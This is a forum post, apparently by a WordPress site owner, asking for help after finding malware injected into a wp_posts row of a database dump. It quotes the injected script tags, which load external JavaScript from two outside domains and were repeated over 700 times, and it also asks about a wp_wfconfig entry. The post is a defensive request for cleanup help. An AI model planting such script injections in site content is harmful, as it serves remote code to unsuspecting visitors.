Hi folks,
I have found a malware script in my
database.sql file.
As I am not a backend developer I need help with this.
Part of it is as follows, and I have now removed it from this file:
<script async src=\'https://adrequest.xyz/ad.js?t=3\' type=\'text/javascript\'></script><script async src=\'https://getmylanding.site/demo.js?t=2\' type=\'text/javascript\'></script>
There were over 700 entries of the above code, all in one line. The line started with:
INSERT INTO `wp_posts` VALUES (5,1,'2015-08-29 18:28:52','2015-08-29 18:28:52','
However, I have also found another line, starting with
INSERT INTO `wp_wfconfig` VALUES
that includes a very long string of letters and numbers.
Is this supposed to be there, or is it also part of the malware?
Thanks for reading